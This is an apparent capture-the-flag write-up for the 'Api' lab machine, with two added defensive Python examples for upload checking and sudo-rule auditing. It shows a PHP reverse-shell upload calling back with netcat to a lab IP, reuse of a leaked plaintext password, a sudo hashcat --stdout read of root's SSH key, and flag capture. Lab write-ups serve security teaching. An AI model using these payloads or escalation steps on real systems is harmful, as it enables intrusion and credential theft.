Api

Capturing the traffic and inspecting the response packets reveals a path, /backend-api.

Visiting /backend-api lists the files code.php, file.php and uploads.

Visiting file.php returns the response below, so a file-upload request has to be constructed by hand.

```json
{
    "status": "error",
    "message": "仅支持POST请求",
    "hint": "请使用POST方法发送请求。"
}
```

Constructing the file-upload request

According to RFC 1867, the body of a file-upload request must have the following structure:

```http
POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

<file binary content>
------WebKitFormBoundaryABC123--
```

A correctly constructed multipart/form-data file-upload request:

```http
POST /backend-api/file.php HTTP/1.1
Host: 192.168.2.24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://192.168.2.24/backend-api/
Cookie: PHPSESSID=glpbe525b95iu26pc1hal761j8
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
Content-Length: 233

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="file"; filename="rev.php"
Content-Type: text/plain

<?php
exec("busybox nc 192.168.2.4 4444 -e /bin/bash");
?>

------WebKitFormBoundaryABC123--
```
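The upload above works because file.php stores whatever it receives under the web root, and the declared `Content-Type: text/plain` would satisfy a handler that only checks the MIME type. As an added example (not code from the write-up or from the target machine), the following Python parses a multipart/form-data body in exactly the RFC 1867 shape shown above and applies the checks a hardened upload handler should make before saving anything. The allowlists, the helper names (`parse_multipart`, `check_upload`, `audit`) and the four sample parts are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Hypothetical upload policy for this example: what a hardened file.php would accept.
ALLOWED_EXTENSIONS = {"txt", "png", "jpg", "jpeg", "pdf"}
ALLOWED_CONTENT_TYPES = {"text/plain", "image/png", "image/jpeg", "application/pdf"}
# Inner extensions that must never appear even before an allowed one
# (a web server with multiple-extension handling may still execute shell.php.txt).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}


@dataclass
class Part:
    name: str
    filename: Optional[str]
    content_type: str
    body: bytes


def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body (RFC 1867 / RFC 2046) into its parts."""
    delimiter = b"--" + boundary.encode("ascii")
    parts = []
    # index 0 is the preamble before the first delimiter (empty in a normal request)
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]                # CRLF that ends the delimiter line
        if chunk.endswith(b"\r\n"):
            chunk = chunk[:-2]               # CRLF that precedes the next delimiter
        header_blob, _, content = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in header_blob.decode("latin-1").split("\r\n"):
            key, sep, value = line.partition(":")
            if sep:
                headers[key.strip().lower()] = value.strip()
        params = dict(re.findall(r'(\w+)="([^"]*)"', headers.get("content-disposition", "")))
        parts.append(Part(
            name=params.get("name", ""),
            filename=params.get("filename"),
            content_type=headers.get("content-type", "application/octet-stream").lower(),
            body=content,
        ))
    return parts


def check_upload(part: Part):
    """Return (accepted, reason). The client-declared Content-Type is never the only check."""
    if part.filename is None:
        return False, "not a file part"
    # keep only the basename so "../" or "..\\" in the filename cannot choose a directory
    base = part.filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or base.startswith("."):
        return False, "empty or hidden filename"
    segments = base.lower().split(".")
    if len(segments) < 2:
        return False, f"no extension: {base}"
    last, inner = segments[-1], segments[1:-1]
    if last not in ALLOWED_EXTENSIONS:
        return False, f"extension not allowed: {base}"
    if any(s in EXECUTABLE_EXTENSIONS for s in inner):
        return False, f"executable inner extension: {base}"
    if part.content_type not in ALLOWED_CONTENT_TYPES:
        return False, f"content type not allowed: {part.content_type}"
    # the declared type is attacker-controlled, so also sniff the body for a PHP open tag
    if b"<?php" in part.body or b"<?=" in part.body:
        return False, "PHP open tag in file body"
    return True, "ok"


# Constructed sample body: same boundary as the write-up, placeholder file contents.
BOUNDARY = "----WebKitFormBoundaryABC123"


def part_bytes(filename: str, content_type: str, body: bytes) -> bytes:
    return (b"--" + BOUNDARY.encode() + b"\r\n"
            + f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'.encode()
            + f"Content-Type: {content_type}\r\n\r\n".encode() + body + b"\r\n")


SAMPLE_BODY = (
    part_bytes("rev.php", "text/plain", b"<?php /* constructed placeholder */ ?>")
    + part_bytes("notes.txt", "text/plain", b"hello")
    + part_bytes("shell.php.txt", "text/plain", b"x")
    + part_bytes("avatar.png", "image/png", b"\x89PNG<?php ?>")
    + b"--" + BOUNDARY.encode() + b"--\r\n"
)


def audit(body: bytes, boundary: str) -> list:
    """(filename, accepted, reason) for every part of the body."""
    return [(p.filename, *check_upload(p)) for p in parse_multipart(body, boundary)]


if __name__ == "__main__":
    for filename, ok, reason in audit(SAMPLE_BODY, BOUNDARY):
        print(f"{'ACCEPT' if ok else 'REJECT'} {filename}: {reason}")
```

Run stand-alone it rejects rev.php on the extension (before the MIME type is even consulted), rejects shell.php.txt on the inner extension, rejects the "PNG" whose body carries a PHP open tag, and accepts notes.txt. Saving accepted files under a server-generated name outside the document root, rather than under uploads/ as file.php does, removes the remaining path for a stored payload to be executed.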

The upload succeeds.

Obtaining web-user access

The reverse shell connects back and access as the web user is obtained.

Obtaining the xiaozhihuaa user

Looking at login.php, a mock account and password, root:0tmyxZKD1szqdAYe, are found.

Using the password 0tmyxZKD1szqdAYe, switching to the xiaozhihuaa user succeeds:

```console
www-data@Api:/var/www/html$ su xiaozhihuaa
Password:
xiaozhihuaa@Api:/var/www/html$ id
uid=1000(xiaozhihuaa) gid=1000(xiaozhihuaa) groups=1000(xiaozhihuaa)
```

Privilege escalation via hashcat

Checking sudo shows that hashcat can be run with root privileges without a password:

```console
xiaozhihuaa@Api:/var/www/html$ sudo -l
Matching Defaults entries for xiaozhihuaa on Api:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User xiaozhihuaa may run the following commands on Api:
    (ALL) NOPASSWD: /usr/bin/hashcat
```

Looking through hashcat's command-line options, the --stdout flag does not crack anything; it only prints the candidate words, so pointing it at a file prints that file's contents.
Read root's SSH private key:

```console
xiaozhihuaa@Api:/tmp$ sudo /usr/bin/hashcat --stdout /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
```
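The sudo rule above and the --stdout read it enables are a least-privilege failure rather than a hashcat bug: any rule that runs a tool with unconstrained arguments as root hands out every file that tool can open. As an added defender-side example (not from the write-up), the following Python parses `sudo -l` output of the form shown earlier and flags rules that give file access or a shell as the run-as user. The two classification sets, the helper names (`parse_sudo_l`, `audit_rules`) and the two extra rules in the sample output are constructed for this example; the hashcat rule is the one from the page.

```python
import os
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed classification for this example, not an authoritative list.
# Programs with an interactive escape or arbitrary file access even when
# sudoers pins their arguments.
SHELL_ESCAPE = {"less", "more", "man", "vim", "vi", "nano", "find", "awk",
                "python3", "perl", "env", "bash", "sh"}
# Programs that are dangerous only when the rule leaves the arguments open;
# hashcat is here because --stdout echoes whatever file it is given.
FILE_ACCESS_WITH_ARGS = {"hashcat", "cat", "head", "tail", "tar", "zip",
                         "sed", "cp", "dd", "tee"}

# "(runas) TAG: TAG: /path/to/command optional args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


@dataclass
class Rule:
    runas: str
    nopasswd: bool
    command: str
    args: Optional[str]        # None: any arguments accepted; "": no arguments allowed


@dataclass
class Finding:
    rule: Rule
    severity: str
    reasons: List[str] = field(default_factory=list)


def parse_sudo_l(text: str) -> List[Rule]:
    """Parse the 'may run the following commands' section of `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd_and_args = m.group("cmd").split(None, 1)
        command = cmd_and_args[0]
        args = cmd_and_args[1] if len(cmd_and_args) > 1 else None
        if args == '""':           # sudoers syntax for "no arguments allowed"
            args = ""
        rules.append(Rule(
            runas=m.group("runas").strip(),
            nopasswd="NOPASSWD:" in m.group("tags"),
            command=command,
            args=args,
        ))
    return rules


def audit_rules(rules: List[Rule]) -> List[Finding]:
    """Flag rules that effectively grant file access or a shell as the run-as user."""
    findings = []
    for r in rules:
        base = os.path.basename(r.command)
        reasons = []
        if r.command == "ALL":
            reasons.append("any command may be run")
        elif base in SHELL_ESCAPE:
            reasons.append(f"{base} offers a shell escape or file access regardless of arguments")
        elif base in FILE_ACCESS_WITH_ARGS and r.args is None:
            reasons.append(f"{base} with free arguments can read or write any file as {r.runas}")
        if not reasons:
            continue
        severity = "high"
        if r.nopasswd:
            reasons.append("NOPASSWD: no password check before it runs")
            severity = "critical"
        findings.append(Finding(r, severity, reasons))
    return findings


# Constructed sample: the page's hashcat rule plus two made-up rules for contrast.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for xiaozhihuaa on Api:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User xiaozhihuaa may run the following commands on Api:
    (ALL) NOPASSWD: /usr/bin/hashcat
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (root) /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{f.severity}] ({f.rule.runas}) {f.rule.command} {f.rule.args or '<any args>'}")
        for reason in f.reasons:
            print(f"    - {reason}")
```

The hashcat rule comes out as critical (free arguments plus NOPASSWD), the less rule as high even with a fixed argument, and the systemctl rule with pinned arguments is not reported. The remediation for the page's rule is to remove it or to expose a wrapper script with fixed arguments; trying to pin arguments for a tool with hundreds of options is not a reliable control.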

Connect directly with root's private key:

```console
┌──(root㉿kali)-[/tmp]
└─# ssh root@192.168.2.24 -i id
Linux Api 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 10 22:54:08 2025 from 192.168.2.4
root@Api:~# id
uid=0(root) gid=0(root) groups=0(root)
```

Read the flags:

```console
root@Api:~# cat /home/xiaozhihuaa/user.txt /root/root.txt
flag{user-7a1b1a56f991412e9b0c1d8e02a5f945}
flag{root-9f48a1abe48a40c5bf1830b233775a3c}
```

Api
http://miao-sec.github.io/Maze-sec/Api/
Author: Miao
Published: 9 January 2026
License: BY-MIAO